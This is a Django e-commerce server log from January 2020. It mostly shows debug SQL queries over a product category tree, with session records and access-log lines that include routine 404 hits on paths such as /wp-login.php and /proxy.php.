DEBUG 2020-01-01 05:55:55,153 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2020-01-01 05:55:55,157 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2020-01-01 05:55:55,159 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2020-01-01 05:55:55,161 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2020-01-01 05:55:55,163 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2020-01-01 05:55:55,167 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2020-01-01 05:55:55,170 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2020-01-01 05:55:55,173 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2020-01-01 05:55:55,175 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2020-01-01 05:55:55,178 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2020-01-01 05:55:55,182 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2020-01-01 05:55:55,185 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2020-01-01 05:55:55,189 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2020-01-01 05:55:55,191 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2020-01-01 05:55:55,194 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2020-01-01 05:55:55,196 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2020-01-01 05:55:55,198 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2020-01-01 05:55:55,201 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2020-01-01 05:55:55,204 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2020-01-01 05:55:55,206 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2020-01-01 05:55:55,208 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2020-01-01 05:55:55,210 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2020-01-01 05:55:55,214 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2020-01-01 05:55:55,216 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2020-01-01 05:55:55,218 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2020-01-01 05:55:55,221 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2020-01-01 05:55:55,223 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2020-01-01 05:55:55,225 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2020-01-01 05:55:55,228 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2020-01-01 05:55:55,230 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2020-01-01 05:55:55,232 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2020-01-01 05:55:55,236 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2020-01-01 05:55:55,238 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [01/Jan/2020 05:55:55] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [01/Jan/2020 06:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [01/Jan/2020 06:05:02] "GET / HTTP/1.0" 302 0 [01/Jan/2020 06:10:05] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [01/Jan/2020 06:11:19] "GET /proxy.php HTTP/1.0" 404 6346 [01/Jan/2020 06:18:11] "GET / HTTP/1.0" 302 0 [01/Jan/2020 06:23:13] "GET / HTTP/1.0" 302 0 [01/Jan/2020 06:28:16] "GET / HTTP/1.0" 302 0 [01/Jan/2020 06:30:02] "GET /whm-server-status HTTP/1.0" 301 0 [01/Jan/2020 06:33:19] "GET / HTTP/1.0" 302 0 [01/Jan/2020 06:38:21] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-01 06:40:21,747 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'weborg'; args=('weborg',) Not Found: /weborg/ [01/Jan/2020 06:40:21] "GET /weborg/ HTTP/1.0" 404 1728 [01/Jan/2020 06:43:24] "GET / HTTP/1.0" 302 0 [01/Jan/2020 06:48:26] "GET / HTTP/1.0" 302 0 [01/Jan/2020 06:55:18] "GET / HTTP/1.0" 302 0 [01/Jan/2020 07:05:03] "GET / HTTP/1.0" 302 0 [01/Jan/2020 07:10:06] "GET / HTTP/1.0" 302 0 [01/Jan/2020 07:15:16] "GET / HTTP/1.0" 302 0 [01/Jan/2020 07:17:40] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-01 07:17:42,292 utils 2749 140297243715328 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'pwn78jhmx75jpu0mloqrlftawj8onm67' LIMIT 1; args=('pwn78jhmx75jpu0mloqrlftawj8onm67',) DEBUG 2020-01-01 07:17:42,294 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('pwn78jhmx75jpu0mloqrlftawj8onm67', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T07:17:42.292646+00:00'::timestamptz); args=('pwn78jhmx75jpu0mloqrlftawj8onm67', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 7, 17, 42, 292646, tzinfo=)) [01/Jan/2020 07:17:42] "GET /login/?next=/ HTTP/1.0" 200 1786 [01/Jan/2020 07:21:46] "GET / HTTP/1.0" 302 0 [01/Jan/2020 07:26:49] "GET / HTTP/1.0" 302 0 [01/Jan/2020 07:31:51] "GET / HTTP/1.0" 302 0 [01/Jan/2020 07:36:53] "GET / HTTP/1.0" 302 0 [01/Jan/2020 07:41:56] "GET / HTTP/1.0" 302 0 [01/Jan/2020 07:46:59] "GET / HTTP/1.0" 302 0 [01/Jan/2020 07:52:01] "GET / HTTP/1.0" 302 0 [01/Jan/2020 07:53:07] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-01 07:53:09,253 utils 2749 140297243715328 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'nfs0qb6ug8kwjg80cmk0z2c8ftf2n3gx' LIMIT 1; args=('nfs0qb6ug8kwjg80cmk0z2c8ftf2n3gx',) DEBUG 2020-01-01 07:53:09,255 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('nfs0qb6ug8kwjg80cmk0z2c8ftf2n3gx', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T07:53:09.253819+00:00'::timestamptz); args=('nfs0qb6ug8kwjg80cmk0z2c8ftf2n3gx', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 7, 53, 9, 253819, tzinfo=)) [01/Jan/2020 07:53:09] "GET /login/?next=/ HTTP/1.0" 200 1786 [01/Jan/2020 07:57:04] "GET / HTTP/1.0" 302 0 [01/Jan/2020 08:05:03] "GET / HTTP/1.0" 302 0 [01/Jan/2020 08:08:22] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-01 08:08:25,091 utils 2749 140297243715328 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'k5pk8fj0zqb603rk324ooiwd4edro1hy' LIMIT 1; args=('k5pk8fj0zqb603rk324ooiwd4edro1hy',) DEBUG 2020-01-01 08:08:25,092 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('k5pk8fj0zqb603rk324ooiwd4edro1hy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T08:08:25.091634+00:00'::timestamptz); args=('k5pk8fj0zqb603rk324ooiwd4edro1hy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 8, 8, 25, 91634, tzinfo=)) [01/Jan/2020 08:08:25] "GET /login/?next=/ HTTP/1.0" 200 1786 [01/Jan/2020 08:10:05] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [01/Jan/2020 08:12:28] "GET /proxy.php HTTP/1.0" 404 6346 [01/Jan/2020 08:15:08] "GET / HTTP/1.0" 302 0 [01/Jan/2020 08:20:10] "GET / HTTP/1.0" 302 0 [01/Jan/2020 08:25:13] "GET / HTTP/1.0" 302 0 [01/Jan/2020 08:33:19] "GET / HTTP/1.0" 302 0 [01/Jan/2020 08:38:22] "GET / HTTP/1.0" 302 0 [01/Jan/2020 08:43:25] "GET / HTTP/1.0" 302 0 Not Found: /wp-login.php [01/Jan/2020 08:50:06] "GET /wp-login.php HTTP/1.0" 404 6360 [01/Jan/2020 08:50:46] "GET / HTTP/1.0" 302 0 [01/Jan/2020 08:55:48] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-01 08:56:47,988 utils 2749 140297243715328 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2020-01-01 08:56:47,998 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2020-01-01 08:56:48,001 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2020-01-01 08:56:48,004 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2020-01-01 08:56:48,007 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2020-01-01 08:56:48,010 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2020-01-01 08:56:48,012 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2020-01-01 08:56:48,015 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2020-01-01 08:56:48,017 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2020-01-01 08:56:48,021 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2020-01-01 08:56:48,023 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2020-01-01 08:56:48,026 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2020-01-01 08:56:48,028 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2020-01-01 08:56:48,031 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2020-01-01 08:56:48,035 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2020-01-01 08:56:48,037 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2020-01-01 08:56:48,039 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2020-01-01 08:56:48,042 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2020-01-01 08:56:48,044 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2020-01-01 08:56:48,048 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" 